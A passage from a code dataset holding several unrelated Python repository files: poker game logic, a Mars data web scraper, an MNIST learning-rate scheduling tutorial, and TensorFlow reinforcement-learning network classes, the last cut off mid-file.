self.nextTurn(playerList)\r\n        if self.gameStatus.count(1) == self.numPlayers - self.gameStatus.count(0):\r\n            self.nextTurn(playerList)\r\n\r\n\r\n    def nextRound(self, playerList):\r\n        playerList[self.roundWinner].money += sum(self.betList)\r\n        self.smallBlind = (self.smallBlind + 1) % self.numPlayers\r\n        self.bigBlind = (self.bigBlind + 1) % self.numPlayers\r\n        self.dealer = (self.dealer + 1) % self.numPlayers\r\n        self.currentPlayer = self.smallBlind\r\n        for player in playerList:\r\n            player.fold = False\r\n            player.hand = []\r\n        self.pot = 0\r\n        self.count = 0\r\n        self.game.deck = Deck()\r\n        self.game.deck.onBoard = []\r\n        self.game.playerHands = []\r\n        self.game.simulatedFlopCards = []\r\n        self.game.deck.shuffle()\r\n        self.game.startGame()\r\n        self.winnerHand = None\r\n        self.winnerType = None\r\n        self.roundWinner = None\r\n        self.gameStage = [\"Pre-Flop\"]\r\n        self.betList = [0] * self.numPlayers\r\n        self.blinds(playerList)\r\n        self.gameStatus = [2] * self.numPlayers\r\n        self.defBet = 20\r\n        self.tempBet = self.defBet\r\n\r\n    \r\n    def nextTurn(self, playersList):\r\n        status = self.updateStatus(playersList)\r\n        if status.count(True) == 1:\r\n            self.roundWinner = status.index(True)\r\n            playersList[self.roundWinner].money += sum(self.betList)\r\n            self.roundOver = True\r\n        self.pot += sum(self.betList)\r\n        self.betList = [0] * self.numPlayers\r\n        self.lastPlayerMove = None\r\n        self.tempBet = 20\r\n        self.messages = []\r\n        foldCount = 0\r\n        final = []\r\n        for player in self.game.players:\r\n            player.alreadyPlayed = False\r\n            if player.fold == True:\r\n                final.append(0)\r\n            else:\r\n                final.append(2)\r\n        if len(self.game.deck.onBoard) < 5:\r\n            self.gameStatus = final\r\n            if \"Pre-Flop\" in self.gameStage and self.count == 0:\r\n                self.game.flop()\r\n                self.gameStage.append(\"Post-Flop\")\r\n                self.count += 1\r\n            elif \"Post-Flop\" in self.gameStage and self.count == 1:\r\n                self.gameStage.append(\"Post-Flop 1\")\r\n                self.game.deck.burn(1)\r\n                self.game.deck.deal(1, True)\r\n                self.count += 1\r\n            elif \"Post-Flop 1\" in self.gameStage and self.count == 2:\r\n                self.gameStage.append(\"Post-Flop 2\")\r\n                
self.game.deck.burn(1)\r\n self.game.deck.deal(1, True)\r\n self.count += 1\r\n else:\r\n stillPlaying = []\r\n for i in range(len(self.gameStatus)):\r\n status = self.gameStatus[i]\r\n if status != 0:\r\n stillPlaying.append(self.game.playerHands[i])\r\n\r\n result = bestInTable(stillPlaying, self.game.deck.onBoard)\r\n if result == \"split\" and self.numPlayers == 2:\r\n self.roundWinner = [0, 1]\r\n playersList[self.roundWinner[0]].money += (sum(self.betList)//2)\r\n playersList[self.roundWinner[1]].money += (sum(self.betList)//2)\r\n else: \r\n self.roundWinner = result[3]\r\n self.winnerType = result[1]\r\n self.winnerHand = result[0]\r\n playersList[self.roundWinner].money += sum(self.betList)\r\n self.roundOver = True\r\n \r\n\r\n\r\n def blinds(self, playersList):\r\n self.betList[self.bigBlind] += self.bigBlindVal\r\n playersList[self.bigBlind].money -= self.bigBlindVal\r\n self.betList[self.smallBlind] += self.smallBlindVal\r\n playersList[self.smallBlind].money -= self.smallBlindVal","repo_name":"danielco68/112TexasHoldem","sub_path":"gameflowMechanics.py","file_name":"gameflowMechanics.py","file_ext":"py","file_size_in_byte":8804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23017798769","text":"#Import Splinter, BeautifulSoup, and Pandas\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport time\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nexecutable_path = {'executable_path': ChromeDriverManager().install()}\n\n\ndef scrape_all():\n # Initiate headless driver for deployment\n browser = Browser('chrome', **executable_path, headless=False)\n\n\n news_title, news_paragraph = mars_news(browser)\n\n # Run all scraping functions and store results in a dictionary\n data = {\n \"news_title\": news_title,\n \"news_paragraph\": news_paragraph,\n \"featured_image\": featured_image(browser),\n \"facts\": mars_facts(),\n \"hemispheres\": hemispheres_bg()\n }\n\n # Stop webdriver and return data\n browser.quit()\n return data\n\ndef mars_news(browser):\n # Visit the Mars news site\n url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\n browser.visit(url)\n\n # Convert the browser html to a soup object\n html = browser.html\n soup = bs(html, 'html.parser')\n\n #Use the parent element to find the first a tag and save it as `news_title`\n element = soup.select_one('div.list_text')\n element.find('div', class_='content_title')\n news_title = element.find('div', class_='content_title').get_text()\n #news_title\n # Use the parent element to find the paragraph text\n news_p = element.find('div', class_='article_teaser_body').get_text()\n #news_p\n\n return news_title, news_p\n\ndef featured_image(browser):\n # Visit URL\n jpl_url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html'\n browser.visit(jpl_url)\n\n # Find and click the full image button use .click\n variable_button = browser.find_by_tag('button')[1]\n variable_button.click()\n\n # Parse the resulting html with soup\n html_page = browser.html\n html_soup = bs(html_page, 'html.parser')\n #print(html_soup)\n\n # find the relative image url\n featured_image_url = html_soup.find('img', class_ = 'fancybox-image').get('src')\n #featured_image_url\n\n # Use the base url (prefix webpage) to create an absolute url\n jpeg_html = ('https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/' + 
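\n        # the string concatenation assumes the scraped src is relative to this prefix;\n        # a sketch of a sturdier alternative that also tolerates absolute src values:\n        # urllib.parse.urljoin('https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/', featured_image_url)\n        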
featured_image_url)\n #print(jpeg_html)\n \n return jpeg_html\n\ndef mars_facts():\n mars_df = pd.read_html('https://space-facts.com/mars/')[0]\n mars_df.columns = ['Description', 'Mars']\n mars_df.set_index('Description', inplace=True)\n #mars_df.style.set_caption('Mars Facts')\n \n return mars_df.to_html(classes=\"table table-striped\")\n \ndef hemispheres_bg(): \n browser = Browser('chrome', **executable_path, headless=False)\n browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')\n\n hemisphere_image_urls = []\n\n for i in range (4):\n #looks like an active person is using the webpage and not look like scraping\n #time.sleep(15)\n images=browser.find_by_tag('h3')\n images[i].click()\n html=browser.html\n soup=bs(html, 'html.parser')\n #<img class=\"wide-image\" src=\"/cache/images/f5e372a36edfa389625da6d0cc25d905_cerberus_enhanced.tif_full.jpg\">\n ending_url = soup.find('img', class_ = 'wide-image')['src']\n #<h2 class=\"title\">Cerberus Hemisphere Enhanced</h2>\n image_title = soup.find('h2', class_='title').text\n image_url = f'https://astrogeology.usgs.gov{ending_url}'\n image_dict = {'title': image_title, 'image_url': image_url}\n hemisphere_image_urls.append(image_dict)\n browser.back()\n\n browser.quit()\n \n return hemisphere_image_urls\n\nif __name__ == \"__main__\":\n\n # If running as script, print scraped data\n print(scrape_all())\n #print(hemispheres_bg())","repo_name":"bethgietl/web-scraping-challenge","sub_path":"app/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25588187848","text":"#%%\nimport numpy as np \nimport pandas as pd \nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.python.ops.gen_math_ops import log1p_eager_fallback, minimum_eager_fallback\n#%%\nmnist = keras.datasets.mnist\n(x_train, y_train),(x_test, y_test)=mnist.load_data()\n\n# 데이터 탐색\nimport matplotlib.pyplot as plt\nplt.imshow(x_train[0],cmap='gray')\ny_train[0]\nx_train[0]\n\n# 데이터 전처리\nfrom tensorflow.keras.utils import to_categorical\ndef percentage_onehot(x,y):\n x=np.array(x/255.0, dtype=np.float32) \n y=np.array(y, dtype=np.float32) \n \n OH_y = to_categorical(y)\n return x, OH_y\n\nx_train, y_train = percentage_onehot(x_train, y_train)\nx_test, y_test = percentage_onehot(x_test, y_test)\n#%%\nfrom tensorflow.keras import layers \nfrom tensorflow.keras.models import Model\nimport tensorflow as tf\n\n# functional_api\ninput_size_width = x_train.shape[1]\ninput_size_height = x_train.shape[2]\n\ndef image_model():\n input_=layers.Input(shape=(input_size_width, input_size_height))\n x = layers.Flatten()(input_)\n x = layers.Dense(100, activation='relu')(x) \n x = layers.Dense(30, activation='relu')(x)\n output_ = layers.Dense(10, activation='softmax')(x) # 실제값 : multinomial distribution\n model=Model(inputs=input_, outputs=output_) \n\n return model\n\nmodel = image_model()\nmodel.summary()\n#\n#%%\n\n\nbatch_train = tf.data.Dataset.from_tensor_slices((x_train, y_train)).shuffle(len(x_train), reshuffle_each_iteration=True).batch(128) #학습용 batch dataset: 128개\n#%%\n'''\n1. 
Adjusting the learning rate with LearningRateScheduler\n - exponential\n'''\ndef lr_scheduler(epoch, lr):\n\tif epoch < 5:\n\t\treturn lr\n\telse:\n\t\treturn lr * tf.math.exp(-0.1)\n\n# set up the model loss and optimizer, then train\nfrom tensorflow.keras.optimizers import Adam\nmodel = image_model()\nmodel.compile(optimizer=Adam(0.001), loss='categorical_crossentropy', metrics=['accuracy'])\ncallback = tf.keras.callbacks.LearningRateScheduler(lr_scheduler)\n\n# train\nhistory = model.fit(x=x_train, y=y_train,\n                    batch_size = 128,\n                    epochs = 10,\n                    validation_split = 0.15,\n                    callbacks = [callback],\n                    verbose = 1)\n\n# training history\nprint(history.history['loss'])\nprint(history.history['accuracy'])\n\n# evaluate model performance on the test data set\nmodel.evaluate(x_test, y_test, batch_size=64)\n#%%\n'''gradient tape\n - exponential'''\n\nlr = 0.1\nlr_schedule = []\nlr_schedule.append(lr)\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(30):\n    x_batch, y_batch = next(iter(batch_train))\n    with tf.GradientTape() as tape:\n        # predict\n        output = model(x_batch)\n        # compute the loss\n        loss = loss_function(y_batch, output)\n        # compute the gradients: differentiate the loss w.r.t. each of the trainable_variables -> gradient-descent update\n        gradients = tape.gradient(loss, model.trainable_variables)\n\n    # backpropagation - weight update\n    if i < 5: # use the initial learning rate\n        for k in range(len(model.trainable_variables)):\n            model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n        lr_schedule.append(lr)\n    else: # decay by a factor of exp(-0.1) per step\n        lr = lr * tf.math.exp(-0.1)\n        for k in range(len(model.trainable_variables)):\n            model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n        lr_schedule.append(lr)\n    print(loss)\n\nplt.plot(lr_schedule)\n#%%\n'''\n2. Adjusting the learning rate with LearningRateScheduler (cont.)\n - step\n'''\ndef step_lr_scheduler(epoch):\n    first_lr = 0.1\n    down = 0.5\n    epoch_down_cycle = 5 # hold for 5 epochs at a time\n    lr = first_lr * (down ** np.floor(epoch/epoch_down_cycle)) # decay the learning rate by a constant ratio (down)\n    print('epoch=', epoch, 'lr=', lr)\n    return lr\n\ncallback = tf.keras.callbacks.LearningRateScheduler(step_lr_scheduler, verbose=1)\nhistory = model.fit(x=x_train, y=y_train,\n                    batch_size = 128,\n                    epochs = 20,\n                    validation_split = 0.15,\n                    callbacks = [callback],\n                    verbose = 1)\n#%%\n'''gradient tape\n - step'''\nlr = 0.1\ndown = 0.5\nepoch_down_cycle = 5 # hold for 5 steps at a time\nlr_schedule = []\nlr_schedule.append(lr)\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(30):\n    x_batch, y_batch = next(iter(batch_train))\n    with tf.GradientTape() as tape:\n        # predict\n        output = model(x_batch)\n        # compute the loss\n        loss = loss_function(y_batch, output)\n        # compute the gradients: differentiate the loss w.r.t. each of the trainable_variables\n        gradients = tape.gradient(loss, model.trainable_variables)\n    # backpropagation - weight update\n    if i % 5 == 0:\n        lr = lr * (down ** np.floor(i / epoch_down_cycle))\n    for k in range(len(model.trainable_variables)):\n        model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n    lr_schedule.append(lr)\n    print(loss)\n\nplt.plot(lr_schedule)\n#%%\n'''\n3. 
Adjusting the learning rate with LearningRateScheduler (cont.)\n - cosine decay restarts\n (the initial lr decays along a cosine curve, then is repeatedly restored to a fraction of the initial lr)\n'''\n#%%\n'''gradient\n - cosine decay restarts'''\ndecay_steps = 10\nalpha = 1e-5 # minimum lr\nmax_lr = first_lr = 0.1 # maximum learning rate\nlr_schedule = []\n\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(60):\n    x_batch, y_batch = next(iter(batch_train))\n    with tf.GradientTape() as tape:\n        # predict\n        output = model(x_batch)\n        # compute the loss\n        loss = loss_function(y_batch, output)\n        # compute the gradients: differentiate the loss w.r.t. each of the trainable_variables\n        gradients = tape.gradient(loss, model.trainable_variables)\n    # backpropagation - weight update\n    if i % decay_steps == 0:\n        max_lr = max_lr * 0.9\n        # lr_schedule.append(max_lr)  # would record max_lr in the schedule without actually applying it\n        lr = max_lr # a new cycle starts at this step, so reset the current lr to max_lr\n        for k in range(len(model.trainable_variables)):\n            model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n        lr_schedule.append(lr)\n    else: # between cycle restarts\n        # lr_schedule.append(lr)\n        for k in range(len(model.trainable_variables)):\n            lr = alpha + 0.5*(max_lr - alpha)*(1 + np.cos(np.pi * (i % decay_steps) / decay_steps)) # decay_steps = number of steps per cycle\n            model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n        lr_schedule.append(lr)\n    print(loss)\n\nplt.plot(lr_schedule)\n#%%\n'''\n4. Adjusting the learning rate with LearningRateScheduler\n - 3 step scheduler (by kaggle Chris Deotte's notebook)\n'''\nLR_START = 1e-5 # initial lr\nLR_MAX = 1e-2\nLR_RAMPUP_EPOCHS = 5 # ramp-up steps\nLR_SUSTAIN_EPOCHS = 10\nLR_STEP_DECAY = 0.75\nlr_schedule = []\n\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(60):\n    x_batch, y_batch = next(iter(batch_train))\n    with tf.GradientTape() as tape:\n        # predict\n        output = model(x_batch)\n        # compute the loss\n        loss = loss_function(y_batch, output)\n        # compute the gradients: differentiate the loss w.r.t. each of the trainable_variables\n        gradients = tape.gradient(loss, model.trainable_variables)\n    if i < LR_RAMPUP_EPOCHS: # ramp up over the first 5 steps\n        lr = LR_START\n        lr_schedule.append(lr)\n        lr = (LR_MAX - LR_START) / LR_RAMPUP_EPOCHS * i + LR_START # i=0 -> LR_START; i=1 -> (LR_MAX-LR_START)/5*1 + LR_START; keeps climbing through i=4\n        for k in range(len(model.trainable_variables)):\n            model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n    elif i < LR_RAMPUP_EPOCHS + LR_SUSTAIN_EPOCHS: # hold constant from step 5 to step 15\n        lr = LR_MAX\n        lr_schedule.append(lr)\n        for k in range(len(model.trainable_variables)):\n            model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n    else:\n        lr_schedule.append(lr)\n        lr = LR_MAX * LR_STEP_DECAY**((i - LR_RAMPUP_EPOCHS - LR_SUSTAIN_EPOCHS)//2) # (15-15)//2 = 0 -> 0.75**0; (16-15)//2 = 0 -> the same; (17-15)//2 = 1 -> 0.75**1; i=18 also gives the first power\n        for k in range(len(model.trainable_variables)):\n            model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n    print(loss)\nplt.plot(lr_schedule)\n#%%\n''' Aside)\n ReduceLROnPlateau for adjusting the learning rate\n\t- dynamically reduces the learning rate when the validation metric stops improving.\n  Gradient descent updates on the training data; validation only evaluates (loss, accuracy) -> the callback fires once progress stalls.\n'''\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\nreduceLR = ReduceLROnPlateau(\n    monitor='val_loss', # trigger the callback based on val_loss\n    factor=0.5, # halve the learning rate when triggered\n    patience=5, # tolerate 5 epochs without improvement in the monitored value\n    mode='min', # the monitored value is a loss -> min\n    min_lr=1e-5,\n    min_delta=0.01, # smallest change that counts as an improvement\n    cooldown=2, # epochs to wait after a reduction\n    verbose=1\n)\nmodel = 
image_model()\n\n# 정리\nmodel.compile(optimizer=Adam(0.001), loss='categorical_crossentropy', metrics=['accuracy'])\nhistory = model.fit(x=x_train, y=y_train, batch_size=128, epochs=20, validation_split=0.15, callbacks=[reduceLR])\n\nmodel.evaluate(x_test, y_test, batch_size=128)\n#%%\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"park-jinaa/ordinal_regression","sub_path":"mnist_lrschedule_give.py","file_name":"mnist_lrschedule_give.py","file_ext":"py","file_size_in_byte":10058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15557807268","text":"import tensorflow as tf\nimport numpy as np\nimport utils\n\n#TODO : For every network change train function interface: it should get placeholder names and values as input. Also change initialization(input placeholder must be provaded as well as hidden layer sizes)\n\ntfDtype = tf.float32 \nclass StateValueNetwork:\n \n def __init__(self, sess, inputLength, hiddenLaySizes, learningRate, inputPh, suffix=\"\", orthogonalInitializtion=False):\n self.inputLength = inputLength\n self.hiddenLayers = hiddenLaySizes\n self.sess = sess\n self.suffix = suffix\n self.orthogonalInitializtion = orthogonalInitializtion\n self.input = inputPh\n self._createDefault()\n\n def _createDefault(self):\n with tf.variable_scope(\"StateValueNetwork{}\".format(self.suffix)):\n \n if not self.orthogonalInitializtion:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(),name=\"fc1\")(self.input)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc{}\".format(i+2))(curNode)\n self.output = tf.layers.Dense(1, kernel_initializer = tf.contrib.layers.xavier_initializer(),name=\"output\")(curNode)\n else:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[0]), name=\"fc1\")(self.input)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[i+1]), name=\"fc{}\".format(i+2))(curNode)\n self.output = tf.layers.Dense(1, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"output\")(curNode)\n \n self.output = tf.squeeze(self.output, 1)\n def forward(self, observations): \n assert (len(observations.shape) == 2 and observations.shape[1] == self.inputLength)\n \n return self.sess.run(self.output, feed_dict = {self.input : observations})\n\nclass QNetwork:\n \n def __init__(self, sess, inputLength, outputLength, hiddenLaySizes, hiddenLayerActivations, inputPh, actionPh, attachActionLayer, suffix, reuse=None):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.hiddenLayers = hiddenLaySizes\n self.hiddenLayerActivations = hiddenLayerActivations\n self.sess = sess\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.suffix = suffix\n self.input = inputPh\n self.action = actionPh\n self.attachActionLayer = attachActionLayer #to which hidden layer to attach action(0 based indexed)\n self.reuse = reuse\n if len(hiddenLaySizes) <= attachActionLayer:\n print(\"\\nattachActionLayer={} outside of network({} hidden layers)\\n\".format(attachActionLayer, len(hiddenLayerActivations))) \n self._createDefault()\n\n def _createDefault(self):\n if self.reuse is not None:\n with 
tf.variable_scope(\"QNetwork{}\".format(self.reuse.suffix), reuse = True):\n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0], name=\"fc1\")(self.input)\n if(self.attachActionLayer == 0):\n curNode = tf.concat([curNode, self.action], axis = 1)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], name=\"fc{}\".format(i+2))(curNode)\n if(self.attachActionLayer == i+1):\n curNode = tf.concat([curNode, self.action], axis = 1, name=\"QNetworkActionConcat\")\n \n self.output = tf.squeeze(tf.layers.Dense(1, self.hiddenLayerActivations[-1], name=\"output\")(curNode),axis=1)\n self.variablesScope = \"QNetwork{}\".format(self.reuse.suffix) \n else: \n with tf.variable_scope(\"QNetwork{}\".format(self.suffix)): \n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0], name=\"fc1\")(self.input)\n if(self.attachActionLayer == 0):\n curNode = tf.concat([curNode, self.action], axis = 1)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], name=\"fc{}\".format(i+2))(curNode)\n if(self.attachActionLayer == i+1):\n curNode = tf.concat([curNode, self.action], axis = 1, name=\"QNetworkActionConcat\")\n \n self.output = tf.squeeze(tf.layers.Dense(1, self.hiddenLayerActivations[-1], name=\"output\")(curNode),axis=1)\n self.variablesScope = \"QNetwork{}\".format(self.suffix) \n \n def forward(self, observations): \n assert (len(observations.shape) == 2 and observations.shape[1] == self.inputLength)\n \n return self.sess.run(self.output, feed_dict = {self.input : observations})\n \nclass PolicyNetworkDiscrete:\n \n def __init__(self, sess, inputLength, outputLength, hiddenLaySizes, inputsPh, actionsPh, suffix, orthogonalInitializtion=False, layerNorm=True):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.hiddenLayers = hiddenLaySizes\n self.sess = sess\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.input = inputsPh\n self.actions = actionsPh\n self.suffix = suffix \n self.orthogonalInitializtion = orthogonalInitializtion\n self._createDefault() \n \n def _createDefault(self):\n with tf.variable_scope(\"PolicyNetworkDiscrete{}\".format(self.suffix)):\n \n if not self.orthogonalInitializtion:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc1\")(self.input)\n curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc{}\".format(i+2))(curNode)\n curNode = tf.contrib.layers.layer_norm(curNode)\n self.logits = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1], kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"ActionsMean\")(curNode)\n else:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[0]), name=\"fc1\")(self.input)\n curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[i+1]), name=\"fc{}\".format(i+2))(curNode)\n curNode = tf.contrib.layers.layer_norm(curNode)\n self.logits = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1], 
kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"ActionsMean\")(curNode)\n \n self.logProbs = tf.nn.log_softmax(self.logits)\n \n self.sampledActions = tf.squeeze(tf.random.categorical(self.logProbs, 1), axis=1)\n self.sampledLogProbs = tf.reduce_sum(tf.one_hot(self.sampledActions, depth = self.outputLength)*self.logProbs)\n \n self.logProbWithCurrParams = tf.reduce_sum(tf.one_hot(tf.squeeze(self.actions,1), depth=self.outputLength)*self.logProbs, axis=1)#log probs for actions given the observation(both fed with placeholder)\n \n \n def getSampledActions(self, inputs): \n return self.sess.run([self.sampledActions, self.sampledLogProbs, self.logProbs], feed_dict = {self.inputs : inputs})\n\n\nclass PolicyNetworkContinuous:\n \n def __init__(self, sess, inputLength, outputLength, hiddenLaySizes, hiddenLayerActivations, inputPh, actionsPh, suffix, actionMeanScale=None, logStdInit=None, logStdTrainable=True, clipLogStd=None, actionClip=None, orthogonalInitializtion=False, layerNorm=True):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.input = inputPh\n self.actions = actionsPh\n self.hiddenLayers = hiddenLaySizes\n self.hiddenLayerActivations = hiddenLayerActivations\n self.sess = sess\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.clipLogStd = clipLogStd\n self.actionClip = actionClip\n self.actionMeanScale = actionMeanScale\n self.logStdInit = logStdInit\n #this applies only if logStds in not None\n self.logStdTrainable = logStdTrainable\n self.suffix = suffix\n self.variablesScope = \"PolicyNetworkContinuous{}\".format(suffix)\n self.orthogonalInitializtion = orthogonalInitializtion\n self._createDefault()\n \n def _createDefault(self):\n with tf.variable_scope(\"PolicyNetworkContinuous{}\".format(self.suffix)):\n \n if not self.orthogonalInitializtion:\n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0], kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc1\")(self.input)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc{}\".format(i+2))(curNode)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n self.actionMean = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1],kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"ActionsMean\")(curNode)\n else:\n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0],kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[0]), name=\"fc1\")(self.input)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[i+1]), name=\"fc{}\".format(i+2))(curNode)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n self.actionMean = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1], kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"ActionsMean\")(curNode)\n \n if(self.actionMeanScale is not None):\n assert(self.actionMeanScale.shape == (1,self.outputLength))\n self.actionMean = self.actionMean * self.actionMeanScale\n\n #logic for noise that is added to action mean\n if self.logStdInit is not None: \n assert(self.logStdInit.shape == 
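\n            # expects one log-std per action dimension, shared across states (a diagonal-Gaussian\n            # policy); a sketch of a valid value is np.zeros((1, output_length), dtype=np.float32),\n            # i.e. an initial std of 1 ('output_length' here standing in for the action dimension)\n            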
(1,self.outputLength)) \n self.actionLogStd = tf.get_variable(name=\"ActionsLogStdDetached{}Trainable\".format(\"\" if self.logStdTrainable else \"Non\"), initializer=self.logStdInit, trainable=self.logStdTrainable)\n else:\n if not self.orthogonalInitializtion: \n self.actionLogStd = tf.layers.Dense(self.outputLength, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"ActionsLogStd\")(curNode)\n else:\n self.actionLogStd = tf.layers.Dense(self.outputLength, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"ActionsLogStd\")(curNode)\n \n if self.clipLogStd is not None:\n self.actionLogStd = tf.clip_by_value(self.actionLogStd, self.clipLogStd[0], self.clipLogStd[1], name=\"ClipedActionsLogStd\")\n\n #here we actualy add noise\n if self.actionLogStd is not None: \n self.actionStd = tf.math.exp(self.actionLogStd) \n self.actionRaw = self.actionMean + tf.random_normal(tf.shape(self.actionMean)) * self.actionStd\n else:\n self.actionRaw = self.actionMean \n \n #action clip\n if self.actionClip is not None: \n assert(self.actionClip.shape == (2, self.outputLength) )\n self.actionFinal = tf.clip_by_value(self.actionFinal, self.actionClip[0,:], self.actionClip[1,:])\n else:\n self.actionFinal = self.actionRaw\n \n #if adding std to action mean, operations for action probabilities\n if self.actionLogStd is not None: \n self.sampledLogProbs = utils.gaussian_likelihood(self.actionFinal, self.actionMean, self.actionLogStd)\n self.logProbWithCurrParams = utils.gaussian_likelihood(self.actions, self.actionMean, self.actionLogStd)#log prob(joint, all action components are from gaussian) for action given the observation(both fed with placeholder)\n \n def getSampledActions(self, observations):\n if self.actionLogStd is not None:\n return self.sess.run([self.actionFinal, self.sampledLogProbs, self.actionMean, self.actionLogStd], feed_dict = {self.input : observations})\n else:\n return self.sess.run([self.actionFinal, self.actionMean], feed_dict = {self.input : observations})\n\n \n \nclass SoftQNetwork:\n \n def __init__(self, sess, inputLength, outputLength, learningRate, alpha, suffix):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.learningRate = learningRate\n self.sess = sess\n self.alpha = alpha\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.initialized = False\n self.suffix = suffix\n \n def _createDefault(self):\n with tf.variable_scope(\"SoftQNetwork{}\".format(self.suffix)):\n self.input = tf.placeholder(dtype = tfDtype, shape = [None, self.inputLength + self.outputLength], name=\"input\")\n curNode = tf.layers.Dense(120, tf.nn.relu, kernel_initializer= tf.initializers.truncated_normal(), name=\"fc1\")(self.input)\n curNode = tf.layers.Dense(84, tf.nn.relu, kernel_initializer= tf.initializers.truncated_normal(), name=\"fc2\")(curNode)\n self.output = tf.layers.Dense(1, kernel_initializer= tf.initializers.truncated_normal(), name=\"output\")(curNode)\n \n self.target = tf.placeholder(dtype = tfDtype, shape = [None, 1], name=\"target\")\n self.loss = tf.losses.mean_squared_error(self.target, self.output)\n \n self.minimizationOperation = tf.train.AdamOptimizer(learning_rate = self.learningRate).minimize(self.loss, global_step = self.global_step)\n \n def forward(self, observations, actions):\n if not self.initialized:\n self._createDefault()\n init = tf.initialize_local_variables()\n init2 = tf.initialize_all_variables()\n self.sess.run([init,init2])\n self.initialized = True\n \n fullInput 
